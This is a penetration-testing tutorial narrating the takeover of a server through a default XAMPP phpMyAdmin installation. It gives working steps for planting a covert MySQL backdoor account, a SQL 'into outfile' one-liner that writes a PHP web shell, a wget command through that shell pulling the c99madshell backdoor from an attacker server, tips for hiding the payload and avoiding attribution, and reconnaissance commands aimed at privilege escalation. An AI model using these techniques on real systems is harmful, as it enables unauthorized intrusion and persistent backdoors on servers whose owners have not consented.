An Open Door
It all begins with a basic error. In this case, the entry point was a default installation of phpMyAdmin, which is a GUI based interface for MySQL, the powerful database application that is considered the standard for open source junkies. Specifically, this gaping hole was a result of a standard XAMPP installation, which leaves phpMyAdmin wide open and available to anyone who happens to find it. Unfortunately for the server administrator, the hole was enough to give the red cell all that was needed to launch a multi-staged exploitation session that eventually led to root access of the target system.
As previously mentioned, phpMyAdmin is only a front end to MySQL. Ironically, thanks to the lack of a valid user account in MySQL, the database engine was secure against remote MySQL requests over port 3306. Yet, thanks to the web-based phpMyAdmin GUI, full control over the database was not only trivial, but simplified. The first step in the attack was to add a user with full read/write access to the databases hosted by MySQL. While not a necessary “hack” in this narrative, it is always a good idea to get your tentacles into a system in a variety of ways, just in case one of the entry points is discovered.
To add a user, simply click on the Privileges link on the main page, and then Add User. Type in a non-descript user name (e.g., mysql, backup, sqlbu), enter your password, ensure you grant the user global access, and save it. Once added, take note of the back door and continue through the wide open front door for simplicity’s sake!
Because the default installation of phpMyAdmin gives the user full access to the rather powerful MySQL commands, the next step is to create a back door to the server itself. There are many ways to do this, the simplest of which is to execute the following command via the SQL query option in phpMyAdmin:
select “<? System($_REQUEST[‘cmd’]); ?>” into outfile “/opt/lampp/htdocs/cmd.php”;
This command will create a file named cmd.php in the root directory of the resources made available by XAMPP. If the phpMyAdmin was not installed in conjunction with this all-in-one package, then you might need to point your outfile to the /var/www/html/ directory or another folder commonly used by Apache to store the web page files. Once you do successfully create the file, you now have pseudo command-line access to the target system[md]albeit a bit lacking when it comes to ease of use.
Because the user experience is a top priority, the next step is to upgrade the minimalistic “shell” into something a bit more powerful and robust. One method is to install a PHP-based back door into the system that can provide a remote attacker with countless features and functions. A wide variety of these PHP shell emulators are available online, but in this case we will illustrate the c99madshell v2.
The first step is to download the shell and store it on a remotely accessible server that the target system can access. Make sure that you DO NOT upload the PHP shell to your server as a *.php file. While malicious hackers will typically use a drop point they have previous hacked to store these files, penetration testers are probably going to use a personal site. If the site administrator is diligent and notices the attack, he or she will check the logs, which will point right back to the attacker’s server. Storing a backdoor shell script in its native format will then give the inquisitive administrator shell access to that system, not to mention anyone else who might find it! So, it is best to store the file as a .txt file or something equally as benign. The following command will download the Madshell php file to the target system:
http://<target>/cmd.php?cmd=wget http://<evilserver>/c99madshell.txt –O madshell.php
Figure 1 illustrates the end result. Ironically, these PHP-based back doors are actually very useful as a remote web-based administrator tool[md]even if they are intended for malicious activities.
Figure 1 c99madshell v.2.0
From here, the options are up to the imagination of the attacker. However, keep in mind that any system-level code that is executed will be done so within the context of a reduced privileged account, typically either nobody or apache. In other words, unless the “root” account executed the web server (highly unlikely, but not impossible), any commands sent via the PHP shell will be limited. As a result, escalated privileges are highly desired. Unfortunately, obtaining such privileges can often be a daunting task depending on the administrator’s ability to keep the target system patched. Yet, where there is a will there is a way[el]as the following illustrates.
Step one is to figure out what version of software you are dealing with. This is important because there is a high chance that if the system kernel level can be determined, then you can also locate a privilege escalation exploit. To narrow down our possible exploits, you will need to perform a bit of system probing via cat commands. Specifically, the following should help:
cat /etc/*-release cat /etc/*-version uname –version cat /etc/issue
Chances are rather high that you will discover what system and kernel version is running on the target system. The following are the help commands provide by using the uname –help command:
-a Display all possible information. Invokes all other options except -S. -m Display the name of the hardware. (i.e. 68020, 386i, 3B20) -n Display the network nodename. The nodename is the name the system is known by on a network. -p Display processor type (i.e. i386, 68020, 68030, SPARC, R3000). -r Display the release number of the operating system. -s Display the name of the UNIX system. This option is the default; if no other options are listed, it is used. -v Display the version of the UNIX system. The version is usually set by the local system administrator. -S The super-user may change the system name and the nodename by using the -S option. The system name can only contain eight characters. Not supported on some systems.
At this point, you will need to analyze the results and build a mirrored attack environment. While this may seem like a lot of extra work, the best way to infiltrate a target system is to emulate it, create an attack scenario based upon the test system, and then launch that attack against the target network.